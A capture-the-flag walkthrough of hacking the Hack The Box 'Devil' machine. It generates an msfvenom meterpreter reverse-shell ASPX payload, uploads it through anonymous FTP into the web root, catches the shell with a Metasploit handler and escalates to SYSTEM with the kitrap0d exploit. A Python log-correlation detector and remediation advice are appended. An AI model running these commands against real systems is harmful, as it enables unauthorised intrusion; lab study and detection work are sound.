# Devil HTB

**Hello brothers, here I will explain how I hacked the Devil machine on the HTB platform. It only took me 10 minutes.**

* First step: I scanned the machine with nmap and used the `-sV` argument to get the versions of the services on the open ports. Here are the results:

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FosoWEP1TDbvBpGRgNta2%2F1.png?alt=media&#x26;token=56020e21-38f1-4a0f-8ebb-1bf2e817d1a7" alt=""><figcaption></figcaption></figure>

  * After the scan, I found 2 open ports, HTTP and FTP. Let's take a look at them.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FOjCsiBnd16NMI1J5XyCY%2Fimage.png?alt=media&#x26;token=cdd25121-da85-4164-a128-66f5d30506b1" alt="" width="375"><figcaption><p>it seems </p></figcaption></figure>

* I attempted to check if I could log in as an anonymous user to the FTP server.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FNc0oLCxilB4NiUHXxIsj%2F2.png?alt=media&#x26;token=869caeb6-a3e3-46a6-8832-c7db429575a4" alt=""><figcaption></figcaption></figure>

* I successfully logged in, and I discovered that every file here can be accessed from the site. Now, let's proceed to create our payload and access it from the browser to get a reverse shell. I used the following payload: **`msfvenom -p windows/meterpreter/reverse_tcp lhost=<listen_ip> lport=<listen_port> -f aspx -o reverse.aspx`**

* Then we go through several steps:

  * Upload our shell to the FTP server with the command: **put reverse.aspx**
  * Set up a listener with msfconsole: **`use exploit/multi/handler`**, and set our IP and port to receive the shell
  * Access the shell from the browser: **\<machine\_ip/reverse.aspx>**

* With these steps, I gained access to the Devil machine.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FBjzitiOdnBVoMgfeDD4W%2F6.png?alt=media&#x26;token=ccec6ef6-e73d-4f5a-8e9b-a8eb7b12aa6a" alt=""><figcaption></figcaption></figure>

* Now, the next objective is to elevate privileges using my favorite module: **`run post/multi/recon/local_exploit_suggester`**

* It generated many results, and I tried a few, but none worked. Finally, I tried the following: **`use exploit/windows/local/ms10_015_kitrap0d`**

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2F6a1pOMMg4wOGr1mJp2FF%2F7.png?alt=media&#x26;token=aa34f62b-89f5-4231-b061-71c93ee9d702" alt=""><figcaption></figcaption></figure>

* It worked successfully, granting me the privileges of NT AUTHORITY\SYSTEM.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2Fqz3bJrSdSlo1FG65aUk8%2F8.png?alt=media&#x26;token=7d7878e3-ba67-4c7e-8c34-e185033e7d06" alt=""><figcaption></figcaption></figure>

* The next step is to find the flags using your preferred method.
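
The foothold above depends on anonymous FTP writing into the web root, so the upload and the later HTTP request both leave log entries. The following is an added detection example, not part of the original writeup: it correlates FTP and web server logs in W3C extended format. The log lines, the field selection, `ANON_USERS`, `SCRIPT_EXT` and the 30-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")  # assumed server-executed types
ANON_USERS = {"anonymous", "ftp"}                 # assumed anonymous account names

# Constructed sample logs (W3C extended format, documentation IP ranges).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:06 192.0.2.10 anonymous PASS - 230
2024-01-01 10:01:12 192.0.2.10 anonymous STOR /reverse.aspx 226
2024-01-01 10:02:00 192.0.2.11 anonymous STOR /logo.png 226
2024-01-01 10:03:00 192.0.2.12 anonymous STOR /denied.aspx 550
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:01:40 192.0.2.10 GET /reverse.aspx 200
2024-01-01 10:03:30 192.0.2.12 GET /denied.aspx 404
2024-01-01 10:05:00 192.0.2.20 GET /index.html 200
"""

def parse_w3c(text):
    """Parse W3C extended log text using its own #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}",
                                          "%Y-%m-%d %H:%M:%S")
            rows.append(row)
    return rows

def find_upload_then_execute(ftp_text, http_text, window=timedelta(minutes=30)):
    """Flag script files stored by an anonymous FTP user and then requested over HTTP."""
    requests = parse_w3c(http_text)
    hits = []
    for up in parse_w3c(ftp_text):
        if not (up["cs-method"].upper() == "STOR"
                and up["sc-status"].startswith("2")          # upload succeeded
                and up["cs-username"].lower() in ANON_USERS
                and up["cs-uri-stem"].lower().endswith(SCRIPT_EXT)):
            continue
        # Compare base names: the FTP root may map to a subfolder of the site.
        name = up["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        for req in requests:
            same = req["cs-uri-stem"].rsplit("/", 1)[-1].lower() == name
            if same and timedelta(0) <= req["ts"] - up["ts"] <= window:
                hits.append({"file": up["cs-uri-stem"], "uploader": up["c-ip"],
                             "requester": req["c-ip"], "requested": req["ts"]})
    return hits

if __name__ == "__main__":
    for hit in find_upload_then_execute(FTP_LOG, HTTP_LOG):
        print(hit)
```

A successful anonymous `STOR` of a script file is worth alerting on by itself; the underlying fix is to disable anonymous write access or move the FTP root out of the web root.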


